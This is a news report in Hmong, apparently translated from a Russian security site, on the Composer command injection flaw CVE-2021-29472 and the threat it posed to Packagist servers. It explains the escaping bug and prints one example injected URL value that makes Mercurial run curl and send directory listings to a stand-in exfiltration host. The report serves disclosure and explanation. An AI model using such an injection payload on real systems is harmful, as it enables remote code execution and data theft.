Ib qho teeb meem tseem ceeb (CVE-2021-29472) tau raug txheeb xyuas nyob rau hauv Composer dependency manager uas tso cai rau kev txiav txim siab tsis ncaj ncees rau hauv lub kaw lus thaum ua cov pob khoom nrog tus nqi tshwj xeeb URL uas qhia qhov chaw nyob rau rub tawm qhov chaws. Qhov teeb meem tshwm sim hauv GitDriver, SvnDriver, thiab HgDriver cov khoom siv thaum siv Git, Subversion, thiab Mercurial qhov chaw tswj xyuas. Qhov tsis zoo tau raug daws hauv Composer tso tawm 1.10.22 thiab 2.0.13.
Nws tau raug sau tseg tshwj xeeb tias qhov teeb meem feem ntau cuam tshuam rau Composer qhov chaw cia khoom qub, Packagist, uas muaj 306 pob khoom rau PHP tsim tawm thiab ua haujlwm ntau dua 1.4 billion rub tawm ib hlis. Qhov kev sim tau pom tias yog tias muaj kev paub txog qhov teeb meem, cov neeg tawm tsam tuaj yeem tau txais kev tswj hwm ntawm Packagist infrastructure thiab cuam tshuam cov ntaub ntawv pov thawj ntawm cov neeg saib xyuas lossis xa rov qab cov pob rub tawm mus rau lwm tus neeg rau zaub mov, teeb tsa kev xa khoom ntawm pob khoom sib txawv nrog kev hloov pauv tsis zoo los hloov lub nraub qaum. thaum lub sij hawm dependency installation txheej txheem.
Qhov txaus ntshai rau cov neeg siv kawg yog txwv rau qhov tseeb tias cov ntsiab lus ntawm composer.json feem ntau yog txiav txim siab los ntawm tus neeg siv, thiab cov kev sib txuas tau raug xa mus thaum nkag mus rau cov chaw tso khoom thib peb, uas feem ntau ntseeg tau. Lub tshuab tseem ceeb poob rau ntawm Packagist.org repository thiab Private Packagist kev pabcuam, uas hu ua Composer nrog kev hloov cov ntaub ntawv tau txais los ntawm cov neeg siv. Cov neeg tawm tsam tuaj yeem ua lawv cov cai ntawm Packagist servers los ntawm kev tso ib pob tshwj xeeb tsim.
Pab pawg Packagist tau kho qhov tsis zoo nyob rau hauv 12 teev tom qab tshaj tawm qhov tsis zoo. Cov kws tshawb fawb ntiag tug tau ceeb toom rau cov neeg tsim khoom Packagist thaum Lub Plaub Hlis 22, thiab qhov teeb meem tau kho tib hnub. Ib qho kev hloov tshiab rau pej xeem rau Composer hais txog qhov muaj qhov tsis zoo tau tshaj tawm rau lub Plaub Hlis 27, nrog cov ntsiab lus nthuav tawm rau lub Plaub Hlis 28. Kev tshawb xyuas cov ntawv teev npe ntawm Packagist servers tsis tau nthuav tawm cov haujlwm tsis txaus ntseeg cuam tshuam nrog qhov tsis zoo.
Qhov teeb meem yog tshwm sim los ntawm kab laum nyob rau hauv URL validation code nyob rau hauv lub hauv paus composer.json cov ntaub ntawv thiab qhov chaw download links. Qhov yuam kev tau tshwm sim hauv qhov chaws txij li lub Kaum Ib Hlis 2011. Packagist siv cov txheej tshwj xeeb los teeb tsa cov lej thauj khoom yam tsis tau khi rau ib qho kev tswj hwm tshwj xeeb, uas raug tua los ntawm kev hu rau "fromShellCommandline" thiab dhau cov kab lus sib cav. Piv txwv li, rau git, cov lus txib "git ls-remote -heads $URL" yog hu ua, qhov twg URL tau ua tiav siv "ProcessExecutor:: khiav tawm ($ url)" txoj kev, escaping tej yam txaus ntshai tsim xws li "$. ..)" or "`...`".
Lub hauv paus ntawm qhov teeb meem yog qhov ProcessExecutor:: txoj kev khiav tawm tsis tau khiav ntawm "-" ntu, uas tso cai rau ib qho kev hu xov tooj ntxiv kom tau teev tseg hauv URL. Xws li kev khiav tawm tau ploj lawm hauv GitDriver.php, SvnDriver.php thiab HgDriver.php tsav tsheb. Qhov kev tawm tsam GitDriver.php tau cuam tshuam los ntawm qhov tseeb tias "git ls-remote" hais kom ua tsis txhawb kev qhia txog kev sib cav ntxiv tom qab txoj kev. Kev tawm tsam ntawm HgDriver.php tau dhau los ua qhov ua tau los ntawm kev dhau qhov "--config" parameter rau "hq" kev siv hluav taws xob, uas tso cai rau koj los teeb tsa kev ua tiav ntawm ib qho lus txib los ntawm kev tswj hwm qhov "alias.identify" chaw. Piv txwv li, txhawm rau rub tawm thiab ua tiav cov lej los ntawm kev khiav cov khoom siv curl, koj tuaj yeem qhia meej: -config=alias.identify=!curl http://exfiltration-host.tld βdata β$(ls -alh)β
Los ntawm kev tshaj tawm cov pob xeem nrog qhov URL zoo sib xws rau Packagist, cov kws tshawb fawb tau tshawb xyuas tias tom qab tshaj tawm, lawv cov server tau txais HTTP thov los ntawm ib qho ntawm Packagist servers hauv AWS uas muaj cov npe ntawm cov ntaub ntawv hauv cov npe tam sim no.
Tau qhov twg los: opennet.ru